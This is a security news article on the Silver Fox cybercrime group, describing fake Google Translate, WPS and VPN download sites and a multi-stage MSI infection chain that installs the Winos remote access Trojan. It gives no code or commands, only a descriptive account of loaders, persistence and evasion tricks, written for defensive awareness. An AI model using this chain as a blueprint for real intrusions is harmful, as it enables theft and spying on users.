Silver Fox Hackers Exploit Weaponized Google Translate Tools to Deliver Windows Malware

The Knownsec 404 Advanced Threat Intelligence Team has lately discovered increased activity from the Silver Fox cybercrime gang, which has been using fake versions of popular programs as weapons to spread malware in a complex cyber threat landscape.

Tracing back to 2024, these attacks often masquerade as legitimate Google Translate interfaces, employing deceptive JavaScript redirects that trigger upon any user interaction on the phishing page.

This interaction prompts a fabricated alert claiming an outdated Adobe Flash Player version, coercing users to download a malicious installer.

Emerging Phishing Campaigns

Upon execution, the payload infiltrates the host system, enabling remote control and data exfiltration.

The gang’s tactics extend beyond translation tools, incorporating search engine optimization (SEO) poisoning and spoofed websites mimicking national institutions, thereby contaminating the broader Chinese internet ecosystem with Trojan-laden downloads.

A typical attack chain involves luring victims to these decoy sites via poisoned search results or phishing emails, followed by the deployment of installers that embed the Winos remote access Trojan (RAT), a core component of the Silver Fox family.

Since its emergence in 2022, the Silver Fox group has evolved from a singular entity into a prolific malware family, fueled by the underground leakage of source code like Winos 4.0.

This has allowed cybercriminals and advanced persistent threat (APT) actors to repurpose the code for diverse campaigns, distributing it through emails, instant messaging, and fabricated download portals.

Recent discoveries include phishing domains impersonating Google Translate, currency converters, and even the official WPS Office site, where embedded scripts facilitate seamless redirection to attacker-controlled servers hosting MSI or EXE installers.

In-Depth Malware Dissection

Technical dissection of the Silver Fox Trojan reveals a multi-stage infection process. For instance, the MSI package releases a suite of files, including aicustact.dll, which dynamically loads attacker-specified payloads from a Property table.

Concurrently, an update.bat script executes legitimate installation routines while surreptitiously launching malicious components.

Persistence is achieved via javaw.exe, which injects Microsoftdata.exe a Golang-compiled binary mimicking official Microsoft nomenclature into the Windows registry for auto-start.

This executable decrypts and executes shellcode from an embedded Xps.dtd file, which in turn loads a portable executable (PE) bearing PDB strings like “RexRat4.0.3,” ultimately invoking the Winos RAT.

Winos boasts modular plugins for advanced espionage, including real-time screenshot capture, keystroke logging, and clipboard data harvesting, granting attackers granular control over compromised endpoints.

Expanding the hunt, researchers identified additional decoys such as fake Easy Translation, Youdao Translation, Bit Browser, and LetsVPN installers, all funneling victims toward Winos deployment.

This modularity underscores Silver Fox’s adaptability, with perpetrators iterating on evasion techniques like code obfuscation, forged digital signatures, and cloud sandbox bypassing to maximize infection rates at minimal cost.

APT groups, including Golden Eye Dog, have repurposed these tools for targeted intrusions, amplifying risks to personal privacy and corporate data integrity across the Chinese digital sphere.

Silver Fox represents a rampant malware cluster eroding user trust in everyday applications. To mitigate, users should verify sources rigorously, prioritize official downloads, and maintain updated security postures. Enhanced vigilance is crucial to counter these pervasive threats.

Indicators of Compromise (IOC)

Find this News Interesting! Follow us on Google News, LinkedIn, and X to Get Instant Updates!